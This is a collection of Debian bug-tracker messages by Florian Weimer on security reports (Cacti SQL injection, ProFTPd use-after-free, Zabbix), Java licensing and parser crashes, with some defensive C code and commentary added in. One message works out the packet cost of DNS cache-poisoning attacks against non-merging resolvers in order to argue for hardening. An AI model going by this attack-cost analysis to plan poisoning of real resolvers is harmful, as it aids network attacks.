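/* Permission bits of `path` (masked to 07777), or -1 on error. */
int dir_mode(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (int)(st.st_mode & 07777);
}

/* Reproduces the upgrade scenario: a directory that already exists as 0755.
 * Returns 0 if ensure_private_dir() brought it down to 0700. */
int self_check(void)
{
    char tmpl[] = "/tmp/privdir-demo-XXXXXX";   /* constructed scratch path */
    int rc = -1;

    if (mkdtemp(tmpl) == NULL) return -1;
    if (chmod(tmpl, 0755) == 0 &&               /* the pre-existing 0755 case */
        dir_mode(tmpl) == 0755 &&
        ensure_private_dir(tmpl) == 0 &&
        dir_mode(tmpl) == 0700)
        rc = 0;
    rmdir(tmpl);
    return rc;
}

int main(void)
{
    printf("self_check: %s\n", self_check() == 0 ? "ok" : "failed");
    return 0;
}
```

The ownership check matters for the same reason as the chmod: the code must not quietly start writing cookies into a directory whose permissions it cannot control.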






Bug#388141: Let's ask for a relicensing agreement

2012-01-26 Thread Florian Weimer
* David Prévot:

 provided to the Debian website

Perhaps it could be made clearer that this applies to the web site
proper and not to other contributions to Debian which also appear on
the web.

I think there should be a paragraph about third party contributions
submitted by the recipient.  The recipient cannot relicense those, and
must give the impression of doing so.

 - members of security team who provided DSA (in security/year/);

Are they really covered by copyright?






Bug#516394: djbdns

2012-01-08 Thread Florian Weimer
* Russ Allbery:

 The remaining statement on this bug from the security team is:

 | djbdns should not be part of squeeze until it is properly hardened
 | against cache poisoning.  It is between 100 and 200 times easier than
 | with other DNS servers.

 I don't understand the basis of that comment just from the bug log.  The
 djbdns-specific attack I'm aware of is on SOA, but the bug discussion
 indicates that protecting against SOA isn't sufficient and any cache miss
 will do.  So apparently there's some hardening other than UDP port
 randomization (which djbdns has done for eons) that needs to be done here
 from the security team perspective?  It looks like the hardening that they
 want to implement is duplicate query merging?

Here's an attempt of a write-up of the maths involved, ready for
pasting into LaTeX.  Hopefully, it's not too embarrassing for me.
It's been a while since I did such stuff, probability theory wasn't my
forte, and I have no idea what to do to reduce the final quotient.

Suppose the resolver chooses among $N$ distinct secrets (combinations
of source ports, IP addresses and transaction identifiers, etc.).  To
simplify things, we assume that subsequent choices are uniformly
distributed and independent.

If the resolver merges multiple queries for the same record, all we
can do is to supply $m$ distinct guesses for its choice.  Each
iteration has a probability of $\frac m N$ for success, and we have to
process $m + 2$ packets per total ($m$ guesses, a triggering query,
and its response).  This means that we have to send or receive
\[(m + 2)\left(\frac N m + 1\right) \cong N\] packets on average until
we reach a successful attempt, assuming that $m$ is much smaller than
$N$.

If the resolver does not merge multiple queries, but allows up to $n$
parallel queries, the most straightforward way is to push up the
success probability by sending $n$ parallel queries per attempt.  For
each of those queries, the resolver chooses a distinct secret.  We can
assume the attacker does the same for her $m$ guesses.  This
experiment results in one of
\[\left(N \atop n\right)\left(N \atop m\right)\]
outcomes.  An outcome is unsuccessful if the victim and attacker set
do not intersect.  This means that their union is one of
$\bigl({N\atop n+m}\bigr)$ sets.  Each of those can be distributed
among victim and attacker in
$\bigl({n+m\atop n}\bigr)=\bigl({n+m\atop m}\bigr)$ ways, resulting
in a total of
\[\left(N\atop n+m\right)\left(n+m\atop n\right)
=\left(N\atop n\right)\left(N-n\atop m\right)\]
unsuccessful outcomes.  Thus, the probability of failure is
\[\left(N-n\atop m\right)\left/\left(N\atop m\right)\right.
=\left(N-m\atop N-n-m\right)\left/\left(N\atop N-n\right)\right.
.\]
Each of these attempts requires processing of $m + 2n$ packets.

Putting $N = 2^{30}$, $n=200$, $m=10^4$ yields
$2^{30}\cong1.07\times10^9$ packets for the first approach, and
$5.59\times10^6$ for the second approach, which means that the second
approach is approximately $192$ times cheaper.

 Except that my understanding of the attack is that it requires
 issuing DNS lookups for a (*very*) large number of RRs that are not
 in the local cache.  This is difficult to force a service to do.

Your MTA probably does DNS lookups with user-supplied domain names
(for EHLO and perhaps for MAIL FROM:, if you use things like SPF).
Your browser does as well, although there are some attempts at
limiting Javascript-driven parallel requests.

The general problem with these attacks is that they are likely to take
out your local resolver, but that's a different issue.
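Added here, not part of the message above: the final quotient reduces as follows, with the same $N$, $n$ and $m$.  Written out as a product, the failure probability is

\[\left(N-n\atop m\right)\left/\left(N\atop m\right)\right.
=\prod_{i=0}^{m-1}\frac{N-n-i}{N-i}
=\prod_{i=0}^{m-1}\left(1-\frac{n}{N-i}\right)
\le\left(1-\frac nN\right)^m
\le e^{-nm/N},\]

with near-equality when $n, m \ll N$.  Each attempt therefore succeeds
with probability $p \ge 1-e^{-nm/N} \approx nm/N$ (for $nm \ll N$), the
expected number of attempts is about $N/(nm)$, and the expected packet
cost of the second approach is

\[\frac{m+2n}{p}\approx(m+2n)\frac{N}{nm}=N\left(\frac1n+\frac2m\right).\]

Dividing the merging resolver's $\cong N$ packets by this gives the cost ratio

\[\frac{1}{1/n+2/m}=\frac{nm}{m+2n},\]

which for $n=200$ and $m=10^4$ is $2\times10^6/10400\approx192$, the
figure above.  For $m \gg n$ the ratio is roughly $n$: the advantage
grows in proportion to the number of parallel outstanding queries the
resolver permits, which is why merging duplicate queries (or capping
$n$) is the hardening that matters here.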






Bug#652371: [CVE-2011-4824] SQL injection issue in auth_login.php

2011-12-16 Thread Florian Weimer
Package: cacti
Version: 0.8.7g-1
Tags: security upstream fixed-upstream
Severity: grave

Several vulnerabilities have been disclosed in cacti:

| SQL injection vulnerability in auth_login.php in Cacti before 0.8.7h
| allows remote attackers to execute arbitrary SQL commands via the
| login_username parameter.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4824

The upstream announcement also mentions Cross-site scripting issues:
http://www.cacti.net/release_notes_0_8_7h.php

Would you please prepare fixed packages for lenny and squeeze and send a
source debdiff to the security team?






Bug#645881: critical update 29 available

2011-12-11 Thread Florian Weimer
* Philipp Kern:

 sun-java6 is sadly still a very high profile package.  I won't go and
 break all those installations which force sun-java6 over openjdk-6
 locally, either in unattended installations or through other means.

It's really unfortunate that most of those installations seem to need
sun-java6-plugin, which is the package that is actually dangerous to
install.  (Presumably, only the first stage payload is pure Java, and
the dropped malware won't run, but it's a bit unsettling.)  At least
this package doesn't seem to be installed without explicit request, so
it's not extremely bad.

 openjdk-6 might well be a viable replacement in wheezy, but there
 are no efforts to backport those compatibility patches that might be
 in newer versions.

We will have to switch to a different IcedTea version in squeeze
because the 1.8 branch we currently use will cease to receive security
fixes soonish, probably after the next round of updates.  If we switch
to branch where the plugin is separate (1.10 and later, IIRC), we
could start fixing compatibility issues more aggressively if we wanted
to.

 openjdk-6 might well be a viable replacement in wheezy, but there
 are no efforts to backport those compatibility patches that might be
 in newer versions.

I doubt it.  The incompatibilities do not vanish, unless there is a
critical mass of users who also contribute bug fixes.  We just don't
seem to be there yet.

(I also doubt that Oracle can drop security support for the Java 6
plugin in mid-2012, for mostly the same reason, at least if they don't
want to be entirely reckless.  They haven't even started pushing
Java 7 to end users yet.)






Bug#645881: critical update 29 available

2011-12-11 Thread Florian Weimer
* Matthias Klose:

> On 12/11/2011 01:07 PM, Holger Levsen wrote:
>> Hi,
>> 
>> On Sunday, 11 December 2011, Philipp Kern wrote:
>>> sorry, but I'd rather like to have an announcement that it has a bug,
>> 
>> me too, for all the reasons Philipp noted.
>> 
>> It's also trivial to download the fixed jdk from oracle and build a fixed
>> package, so IMHO an announcement containing these information plus no
>> removal would be best:
>
> the DLJ bundles were created because you are not allowed to re-distribute the
> jdk packages from oracle. Did that change recently?

The main difference seems to be this (DLJ first):

| [...] Sun also grants you a non-exclusive, non-transferable,
| royalty-free limited license to reproduce and distribute the
| Software [...]  provided that: (b) the Software is distributed with
| your Operating System, and such distribution is solely for the
| purposes of running Programs under the control of your Operating
| System and designing, developing and testing Programs to be run
| under the control of your Operating System; [...]

| [...] Oracle grants you a non-exclusive, non-transferable, limited
| license without fees to reproduce and distribute the Software,
| provided that (i) you distribute the Software complete and
| unmodified and only bundled as part of, and for the sole purpose of
| running, your Programs, [...]

Other problematic clauses (indemnification, no bundling with
reimplementations of java.* classes and so on) are also part of the
DLJ.

(I still don't understand why the DLJ was suitable for non-free, so
I'm clearly not qualified to judge these license matters for Debian.)






Bug#651225: Security vulnerabilities (CVE-2011-2904, CVE-2011-3263, CVE-2011-3265, CVE-2011-4674)

2011-12-06 Thread Florian Weimer
Package: zabbix
Version: 1:1.8.2-1squeeze2
Tags: security
Severity: grave

There appear to be several unfixed vulnerabilities in Zabbix in
squeeze, including SQL injection vulnerabilities:

http://security-tracker.debian.org/tracker/CVE-2011-2904
http://security-tracker.debian.org/tracker/CVE-2011-3263
http://security-tracker.debian.org/tracker/CVE-2011-3265
http://security-tracker.debian.org/tracker/CVE-2011-4674

We would appreciate if you prepared fixed packages and contacted the
security team (preferably with a source debdiff of the proposed
upload).  Thanks.






Bug#650880: aptitude safe-upgrade segfaults, aptitude update fails: E: Encountered a section with no Package: header

2011-12-04 Thread Florian Weimer
reopen 650880
reassign 650880 aptitude
retitle 650880 aptitude segfaults with malformed Packages file
severity 650880 normal
tags 650880 -security
thanks

* Ralf Spenneberg:

> Running aptitude upgrade then fails:
>
> LANG=C aptitude safe-upgrade
> Reading package lists... Error!
> E: Encountered a section with no Package: header
> E: Problem with MergeList /var/lib/apt/lists/security.debian.org_dists_lenny_updates_main_binary-amd64_Packages
> E: The package lists or status file could not be parsed or opened.
> Reading package lists... Error!
> Speicherzugriffsfehler

(That's actually segmentation fault.)

The security archive has been fixed, but the aptitude crash above
appears to be a separate issue worth fixing, so reopening.
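The crash above is a parser that does not cope with a stanza lacking its Package: header.  As an added example (not apt or aptitude code; the function names and the sample inputs are constructed for illustration), here is a small C walker over the Packages stanza format that reports such a stanza as an error instead of continuing with an empty record:

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not apt or aptitude code.  A minimal walker over the
 * Packages file format (stanzas of "Field: value" lines separated by
 * blank lines) that rejects a stanza with no Package: field instead of
 * carrying on with an uninitialised record. */

#define PKG_NAME_MAX 64

struct pkg_entry {
    char name[PKG_NAME_MAX];
};

/* Parses text into out[0..max).  Returns the number of stanzas on
 * success.  A stanza without a usable Package: field yields
 * -(1 + its index), so the caller can say which stanza is malformed;
 * -1000 - n signals that more than max stanzas were present.  Never
 * writes past out[max - 1], whatever the input looks like. */
int parse_packages(const char *text, struct pkg_entry *out, int max)
{
    int count = 0;        /* completed stanzas */
    int in_stanza = 0;    /* inside a non-blank run of lines */
    int have_pkg = 0;     /* current stanza has a Package: field */
    const char *p = text;

    for (;;) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);

        if (len == 0) {
            /* blank line or end of input closes the current stanza */
            if (in_stanza) {
                if (!have_pkg)
                    return -(1 + count);
                count++;
                in_stanza = 0;
                have_pkg = 0;
            }
        } else {
            if (!in_stanza) {
                if (count >= max)
                    return -1000 - count;
                in_stanza = 1;
            }
            if (len > 8 && strncmp(p, "Package:", 8) == 0) {
                const char *v = p + 8;
                size_t vlen = len - 8;
                /* trim surrounding blanks from the field value */
                while (vlen > 0 && (*v == ' ' || *v == '\t')) { v++; vlen--; }
                while (vlen > 0 && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t')) vlen--;
                if (vlen == 0 || vlen >= PKG_NAME_MAX)
                    return -(1 + count);     /* empty or oversized name */
                memcpy(out[count].name, v, vlen);
                out[count].name[vlen] = '\0';
                have_pkg = 1;
            }
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    /* input that ends without a trailing blank line */
    if (in_stanza) {
        if (!have_pkg)
            return -(1 + count);
        count++;
    }
    return count;
}

/* Constructed sample input: two well-formed stanzas. */
static const char SAMPLE_OK[] =
    "Package: libfoo1\n"
    "Version: 1.0-1\n"
    "Description: constructed example\n"
    " continuation line\n"
    "\n"
    "Package: bar\n"
    "Architecture: amd64\n";

/* Constructed malformed input: the second stanza has no Package: line,
 * like the broken list in the report above. */
static const char SAMPLE_BAD[] =
    "Package: libfoo1\n"
    "Version: 1.0-1\n"
    "\n"
    "Version: 2.0-1\n"
    "Architecture: amd64\n"
    "\n";
```

The error code carries the index of the offending stanza, which is what a tool like aptitude would need in order to print a usable diagnostic and refuse the file rather than dereference a record it never filled in.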






Bug#645881: critical update 29 available

2011-12-01 Thread Florian Weimer
* Moritz Mühlenhoff:

> Florian, what's the status of openjdk6 for stable/oldstable?

I've released the pending update for squeeze.  lenny will eventually
follow, and so will the pending updates for squeeze, but judging by my
past performance, it will take a while.

If someone else wants to work on these updates, I'll gladly share what
I've learnt about the packaging.






Bug#648373: [CVE-2011-4130] Use-after-free issue

2011-11-11 Thread Florian Weimer
* Francesco P. Lovergine:

>> A use-after-free issue has been discovered in ProFTPd:
>> 
>> http://bugs.proftpd.org/show_bug.cgi?id=3711
>> 
>> It seems that squeeze is vulnerable, too.  I haven't checked the code
>> in lenny yet.
>
> I have 1.3.3a-6squeeze3 ready for squeeze with the required fix. 
> Waiting for a secteam go signal, just in case.

Thanks.  I trust that the call is at the right place; I find the code
somewhat confusing.

Please upload with the usual caveats (1.3.3a-6squeeze2 as version
number, squeeze-security suite, host security-master).






Bug#648359: [CVE-2011-4000] Unspecified buffer overflow vulnerability

2011-11-10 Thread Florian Weimer
Package: libchasen2
Version: 2.4.4-16
Severity: grave
Tags: security

JPCERT disclosed an unspecified buffer overflow vulnerability in
ChaSen:

http://jvn.jp/en/jp/JVN16901583/index.html

Apparently, upstream will not provide patches.  Would you be willing
to work on this issue if we can obtain further details?






Bug#648373: [CVE-2011-4130] Use-after-free issue

2011-11-10 Thread Florian Weimer
Package: proftpd-dfsg
Version: 1.3.3a-6squeeze1
Severity: grave
Tags: security

A use-after-free issue has been discovered in ProFTPd:

http://bugs.proftpd.org/show_bug.cgi?id=3711

It seems that squeeze is vulnerable, too.  I haven't checked the code
in lenny yet.






Bug#645881: critical update 29 available

2011-10-21 Thread Florian Weimer
* Moritz Muehlenhoff:

> As for stable/oldstable: I noticed that Red Hat provided packages for
> update 29 for RHEL 4 (RHEL 5 onwards use OpenJDK): 
> http://lwn.net/Articles/463919/

If anyone remembers the rationale behind the DLJ, perhaps they can
check if the current BCL matches our needs, too?  The licensing
conditions for the stock JDK distribution probably have changed since
the Oracle acquisition, and perhaps these changes are sufficient to
permit redistribution by Debian.

I have also uploaded the fixes for openjdk-6 to security-master (for
squeeze).  It's currently stuck in the unchecked queue, along with the
still-missing previous update for lenny.






Bug#645881: critical update 29 available

2011-10-19 Thread Florian Weimer
* Thijs Kinkhorst:

> Upstream has released Java SE 6 update 29 yesterday:
> http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html
> with security fixes.

Does the lack of a DLJ version affect us?  The special distributor
license is no longer available from Oracle:

| As a consequence, further Oracle JDK 6 (or Oracle JDK 7) releases on
| Linux and Solaris will not be provided under the DLJ. They will
| continue to be provided under the familiar Oracle JDK license, the
| BCL.

http://robilad.livejournal.com/90792.html

I'm not sure if the standard JDK license agreement is sufficient.






Bug#641950: security of Crypt::RC4

2011-09-18 Thread Florian Weimer
* Nicholas Bamber:

> Please could have someone have a look at #641950? This module was
> packaged as it has been flagged up as a dependency of a new version of
> an existing package. However based upon the comments in the bug report
> it really is something we do not wish to encourage.
> In any case the CPAN module seems to be dead upstream. Should we simply
> adjust the description (and if so what tone should be taken) or should
> the package be removed?

RC4 is used by protocols we might want to implement, so we need the
code.  As far as I understand it, there are relatively safe ways to
use the cipher, even though it is severely broken.






Bug#639916: spread: license wackiness

2011-09-04 Thread Florian Weimer
* Ken Arromdee:

> Unlike the original BSD 4 clause license this adds "or software that uses
> this software."

Is it really that much different in effect from the Affero GPL?  It
may be a bit more far-reaching, but compliance is so much easier.






Bug#640093: Incorrect version number prevents automatic upgrades

2011-09-02 Thread Florian Weimer
Package: opensync
Version: 0.22-4squeeze1
Severity: serious

At one point, a binary NMU produced a 0.22-4+b1 version, which is larger
than 0.22-4squeeze1.  Please reupload with a version number like
0.22-4+squeeze1.

(Setting severity to serious because #580867 was serious.)

-- 
Florian Weimer                fwei...@bfk.de
BFK edv-consulting GmbH       http://www.bfk.de/
Kriegsstraße 100              tel: +49-721-96201-1
D-76133 Karlsruhe             fax: +49-721-96201-99






Bug#533934: pperl: FTBFS: tests failed directory

2011-06-13 Thread Florian Weimer
* Dominic Hargreaves:

> I added the quotation marks because I'm starting to doubt that it is
> worth spending time on. I use pperl a bit, but probably wouldn't miss
> it hugely, and upstream appears to be dead.

I don't use it anymore, either.

You could probably get away without hashing, by using something like
$basename.$device.$inode.$counter.  $counter is used to resolve
collisions.






Bug#629852: Oracle Java SE Critical Patch Update Advisory - June 2011

2011-06-13 Thread Florian Weimer
* Torsten Werner:

> On 09.06.2011 02:07, Sylvestre Ledru wrote:
>> On Wednesday, 8 June 2011 at 23:08 +0200, Nico Golde wrote:
>>> Package: openjdk-6-jre, sun-java6-jre
>>> Severity: serious
>>> Tags: security
>>>
>>> A new round of java issues:
>>> CVE-2011-0862 CVE-2011-0873 CVE-2011-0815 CVE-2011-0817 CVE-2011-0863 
>>> CVE-2011-0864 CVE-2011-0802
>>> CVE-2011-0814 CVE-2011-0871 CVE-2011-0786 CVE-2011-0788 CVE-2011-0866 
>>> CVE-2011-0868 CVE-2011-0872
>>> CVE-2011-0867 CVE-2011-0869 CVE-2011-0865
>> I will take care of this bug tomorrow (thursday)
>
> Both openjdk-6 and sun-java6 or sun-java6 only?

Will anyone upload 1.8.8 to unstable soon?  I would like to release
1.8.8 to stable-security, and would have to mess with the version
number to keep it below the unstable/testing version.

I can NMU unstable as well, if that's okay.






Bug#628476: Package does not seem to work at all

2011-05-29 Thread Florian Weimer
Package: python-wordaxe
Version: 0.3.2-1
Severity: grave

The documentation mentions importing wordaxe.DCWHyphenator.  But this
does not work:

fw@deneb:~$ python
Python 2.6.6 (r266:84292, Dec 26 2010, 22:31:48) 
[GCC 4.4.5] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import wordaxe.DCWHyphenator
/usr/lib/pymodules/python2.6/wordaxe/DCWHyphenator.py:12: DeprecationWarning: the sets module is deprecated
  import sets
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/pymodules/python2.6/wordaxe/DCWHyphenator.py", line 26, in <module>
    import wordaxe.dict.DEhyph as DEhyph
ImportError: No module named dict.DEhyph
>>> 







Bug#622817: perl: CVE-2011-1487: taint laundering in lc, uc

2011-04-19 Thread Florian Weimer
* Niko Tyni:

> Security team, I assume this is going to be fixed through a DSA?

I don't think this is a security bug on its own.

> It should be trivial to port this to squeeze and lenny. I'll try to
> prepare the debdiffs on Sunday, but if somebody else wants to do that,
> feel free.

If this bug fixes any actual vulnerabilities, such a backport will
break applications, hard.  Therefore, I would prefer to let it soak in
unstable/testing for some time, to see what happens.






Bug#616114: man in the middle security issue

2011-03-02 Thread Florian Weimer
* Thijs Kinkhorst:

> The following report by PolarSSL upstream was brought to our attention:
> https://lists.ubuntu.com/archives/ubuntu-motu/2011-February/007026.html
>
> Unfortunately it doesn't disclose details. I'll contact the upstream
> maintainer about that, but in any case a good start would be to
> upload the new upstream to unstable. Are you able to do that?

There is now sufficiently detailed information at:

  http://polarssl.org/trac/wiki/SecurityAdvisory201101

Arnaud, could you please prepare fixed packages?






Bug#614151: icedtea6-plugin: (PRSC) Please backport fixes for CVE-2011-0025, 4351 to squeeze, lenny

2011-02-20 Thread Florian Weimer
* Jonathan Wiltshire:

> Package: icedtea6-plugin
> Version: 6b11-9.1
> Severity: grave
> Tags: squeeze lenny security
> Justification: user security hole
> Usertags: prsc-target-lenny, prsc-target-squeeze
>
> Please backport your fixes for the following CVE reports:

There is no icedtea6-plugin package in lenny (and quite deliberately
so).  There is icedtea-gcjwebplugin, which does not work at all AFAIK.
So I don't see there's anything to do for lenny, at least as far as
the openjdk-6 source package is concerned.






Bug#613098: Zero is unusable on amd64

2011-02-12 Thread Florian Weimer
Package: openjdk-6-jre-zero
Version: 6b18-1.8.3-2
Severity: grave

At least on amd64, all tests fail during build, and all non-trivial
programs fail.

Here's a stack trace from javac -zero compiling a trivial program:

java.nio.BufferOverflowException
        at java.nio.charset.CoderResult.throwException(CoderResult.java:276)
        at java.lang.StringCoding$StringEncoder.encode(StringCoding.java:260)
        at java.lang.StringCoding.encode(StringCoding.java:290)
        at java.lang.String.getBytes(String.java:954)
        at java.io.UnixFileSystem.getBooleanAttributes0(Native Method)
        at java.io.UnixFileSystem.getBooleanAttributes(UnixFileSystem.java:243)
        at java.io.File.isFile(File.java:795)
        at com.sun.tools.javac.util.JavacFileManager.listDirectory(JavacFileManager.java:336)
        at com.sun.tools.javac.util.JavacFileManager.list(JavacFileManager.java:926)
        at com.sun.tools.javac.jvm.ClassReader.fillIn(ClassReader.java:2137)
        at com.sun.tools.javac.jvm.ClassReader.complete(ClassReader.java:1795)
        at com.sun.tools.javac.code.Symbol.complete(Symbol.java:400)
        at com.sun.tools.javac.code.Symbol$PackageSymbol.members(Symbol.java:625)
        at com.sun.tools.javac.comp.MemberEnter.importAll(MemberEnter.java:133)
        at com.sun.tools.javac.comp.MemberEnter.visitTopLevel(MemberEnter.java:521)
        at com.sun.tools.javac.tree.JCTree$JCCompilationUnit.accept(JCTree.java:454)
        at com.sun.tools.javac.comp.MemberEnter.memberEnter(MemberEnter.java:400)
        at com.sun.tools.javac.comp.MemberEnter.complete(MemberEnter.java:831)
        at com.sun.tools.javac.code.Symbol.complete(Symbol.java:400)
        at com.sun.tools.javac.code.Symbol$ClassSymbol.complete(Symbol.java:777)
        at com.sun.tools.javac.comp.Enter.complete(Enter.java:465)
        at com.sun.tools.javac.comp.Enter.main(Enter.java:443)
        at com.sun.tools.javac.main.JavaCompiler.enterTrees(JavaCompiler.java:836)
        at com.sun.tools.javac.main.JavaCompiler.compile(JavaCompiler.java:741)
        at com.sun.tools.javac.main.Main.compile(Main.java:380)
        at com.sun.tools.javac.main.Main.compile(Main.java:306)
        at com.sun.tools.javac.main.Main.compile(Main.java:297)
        at com.sun.tools.javac.Main.compile(Main.java:82)
        at com.sun.tools.javac.Main.main(Main.java:67)

Does the package work on any other Shark platform? (-Xint seems to
work.)







Bug#607794: bind 9.6.ESV.R3 DLV and further delegation issue

2011-01-21 Thread Florian Weimer
severity 607794 important
forwarded 607794 bind-b...@isc.org
thanks

* Peter Palfrader:

> Peter Palfrader wrote on Wednesday, 19 January 2011:
>
>> severity 607794 serious
>> thanks
>> 
>> So, I managed to reproduce the problem which has come up a few times
>> now.  Note that 9.7.2.dfsg.P3 is not affected, only 9.6.ESV.R3 in
>> stable.
>
>
>> | dig +dnssec @localhost -t ns www.debian.org
>
> I submitted www.d.o itself to the DLV to work around this bug.  You can
> still see the bug in action at delegation-test2.debian.org:
>
> dig +dnssec @localhost -t ns delegation-test2.debian.org

Thanks, I have reproduced this with stock 9.6-ESV-R3.

Installing the trust anchor for the root appears to be a workaround,
so I'm downgrading the severity.






Bug#493599: pushing udns into squeeze

2010-12-02 Thread Florian Weimer
* Michael Tokarev:

>> udns doesn't handle truncation, so it won't play well with the
>> PowerDNS recursor (which doesn't support EDNS).
>
> One of the limitations of simplicity of design - only one
> socket and it's obviously UDP.  With deployment of DNSSEC
> everywhere EDNS support becomes a requirement, because of
> the size of DNSSEC records, so this problem becomes less
> and less of an issue.  Yes I understand this is where
> udns does not conform to standards.



>> The domain name parser triggers undefined behavior for certain inputs
>> because it performs out-of-bound pointer arithmetic.  This is unlikely
>> to cause practical problems with current GCC versions (but LTO might
>> change this).
>
> And here goes my main question.
>
> http://www.corpit.ru/mjt/udns_dn.c is the code in question, the
> domain parser.  Florian, can you please tell me where do you think
> it performs such oob arith?

I think I was referring to loop exit conditions such as:

  while(--s >= (dnscc_t *)addr) {

These are problematic if the compiler can prove that addr does not
point into an array of suitable struct ?_addr objects.
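To show the loop shape in question, here is an added example in C (not udns code; the function names are mine): the first function forms a pointer one element before the array on its final `--s`, which the C standard leaves undefined even though the pointer is only compared and never dereferenced, so an optimiser may treat the exit condition as always true; the second does the same backwards scan on an index and never forms such a pointer.

```c
#include <stddef.h>

/* Added example, not udns code.  Both functions search buf[0..len) from
 * the end for byte c and return its index, or -1 when it is absent. */

/* The pattern from the quoted loop: pre-decrement, then compare against
 * the array start.  On the final iteration `--s` yields buf - 1.  C only
 * permits pointer values from buf up to buf + len (one past the end), so
 * forming buf - 1 is undefined behaviour even without a dereference, and
 * a compiler is entitled to assume `s >= buf` can never be false.  Kept
 * only to illustrate the shape, not for use. */
long find_last_ub(const unsigned char *buf, size_t len, unsigned char c)
{
    const unsigned char *s = buf + len;
    while (--s >= buf) {          /* last step forms buf - 1: undefined */
        if (*s == c)
            return (long)(s - buf);
    }
    return -1;
}

/* Same scan on an index: the only addresses ever formed lie inside the
 * array, and the empty-buffer case needs no special handling. */
long find_last_safe(const unsigned char *buf, size_t len, unsigned char c)
{
    size_t i = len;
    while (i > 0) {
        i--;                      /* i is always in [0, len) here */
        if (buf[i] == c)
            return (long)i;
    }
    return -1;
}
```

The index form is what to reach for whenever a loop walks backwards to the start of a buffer: the comparison happens before the decrement, so no out-of-range value is ever computed for the compiler to reason about.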






Bug#600667: eglibc: cve-2010-3847 dynamic linker expands $ORIGIN in setuid library search path

2010-10-22 Thread Florian Weimer
* Aurelien Jarno:

> I have just committed the fix, I am planning to do an upload soon to
> unstable. Do you think we should also fix it in stable? via a security
> release?

FYI, I have uploaded eglibc 2.11.2-6+squeeze1 to testing-security.






Bug#584911: bind9: hard-coded dependency on /usr/lib/ssl/openssl.cnf might cause trouble

2010-06-08 Thread Florian Weimer
reassign 584911 openssl 0.9.8g-15+lenny6
retitle 584911 unreadable /usr/lib/ssl/openssl.cnf file breaks OPENSSL_config
thanks

* Mirko Gebauer:

>> BIND uses the NULL argument, as far as I can tell.  So this might be
>> an OpenSSL bug.
>
> Well, all I can say is that bind9 as provided by the package version
> 1:9.5.1.dfsg.P3-1+lenny1 doesn't show the reported behavior, and
> that both 1:9.5.1.dfsg.P3-1+lenny1 and the current
> 1:9.6.ESV.R1+dfsg-0+lenny1 depend on the same version of
> libssl0.9.8.

This is a bug in OpenSSL, and it is impossible to work around in
bind9, unfortunately.  Here's the relevant excerpt from

    ERR_clear_error();
    if (CONF_modules_load_file(NULL, config_name,
            CONF_MFLAGS_DEFAULT_SECTION|CONF_MFLAGS_IGNORE_MISSING_FILE) <= 0)
        {
        BIO *bio_err;
        ERR_load_crypto_strings();
        if ((bio_err=BIO_new_fp(stderr, BIO_NOCLOSE)) != NULL)
            {
            BIO_printf(bio_err,"Auto configuration failed\n");
            ERR_print_errors(bio_err);
            BIO_free(bio_err);
            }
        exit(1);
        }

    return;
    }

The problem is that it's not ignoring permission errors, in contrast
to what's promised in the manual page.  And there doesn't appear to be
a way to bypass that exit(1) call.

I guess the only viable fix is to keep /etc/ssl/openssl.cnf
world-readable.
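As an added example (not OpenSSL's code; names such as cfg_load and the status values are assumptions made for this illustration), here is how a config loader with an "ignore missing file" flag can keep the two cases apart, skipping ENOENT but reporting EACCES, and hand a status back to the caller instead of calling exit():

```c
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added example, not OpenSSL's code.  It models the open step of a
 * config loader and keeps "file absent" apart from "file present but
 * not readable": only the first may be swallowed by an ignore-missing
 * flag, and neither should terminate the calling program. */

enum cfg_status {
    CFG_LOADED = 0,     /* file opened */
    CFG_MISSING,        /* no such file: the one ignorable case */
    CFG_UNREADABLE,     /* exists, but permissions deny access */
    CFG_OTHER           /* anything else (I/O error, fd limit, ...) */
};

/* Map the errno left behind by a failed open() to a status. */
enum cfg_status cfg_classify_errno(int err)
{
    switch (err) {
    case ENOENT:
    case ENOTDIR:
        return CFG_MISSING;
    case EACCES:
    case EPERM:
        return CFG_UNREADABLE;
    default:
        return CFG_OTHER;
    }
}

/* Open the file read-only.  On success *out_fd receives the descriptor;
 * on failure errno is left as open() set it for the caller. */
enum cfg_status cfg_try_open(const char *path, int *out_fd)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return cfg_classify_errno(errno);
    *out_fd = fd;
    return CFG_LOADED;
}

/* Probe without keeping the descriptor; handy for diagnostics. */
enum cfg_status cfg_probe(const char *path)
{
    int fd = -1;
    enum cfg_status st = cfg_try_open(path, &fd);
    if (st == CFG_LOADED)
        close(fd);
    return st;
}

static void cfg_set_err(char *errbuf, size_t errlen, const char *path,
                        const char *why)
{
    if (errbuf && errlen)
        snprintf(errbuf, errlen, "%s: %s", path, why);
}

/* Policy layer.  ignore_missing plays the role of an "ignore missing
 * file" flag.  Returns 0 when the config was loaded or legitimately
 * skipped and -1 when the caller must report a failure (reason in
 * errbuf, if given).  Library code should return like this rather than
 * print and exit on the caller's behalf. */
int cfg_load(const char *path, int ignore_missing, char *errbuf, size_t errlen)
{
    int fd = -1;
    enum cfg_status st = cfg_try_open(path, &fd);
    int saved_errno = errno;        /* from the failed open(), if any */

    switch (st) {
    case CFG_LOADED:
        /* a real loader would parse the file here */
        close(fd);
        return 0;
    case CFG_MISSING:
        if (ignore_missing)
            return 0;               /* absent file: skip as promised */
        cfg_set_err(errbuf, errlen, path, strerror(saved_errno));
        return -1;
    case CFG_UNREADABLE:
        /* present but unreadable is never silently skipped */
        cfg_set_err(errbuf, errlen, path, strerror(saved_errno));
        return -1;
    default:
        cfg_set_err(errbuf, errlen, path, strerror(saved_errno));
        return -1;
    }
}
```

Run against a path such as /etc/ssl/openssl.cnf from an unprivileged account, cfg_probe() tells an administrator directly whether the file is absent or merely unreadable, which is the distinction the report above turns on.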






Bug#584911: bind9: hard-coded dependency on /usr/lib/ssl/openssl.cnf might cause trouble

2010-06-07 Thread Florian Weimer
* Mirko Gebauer:

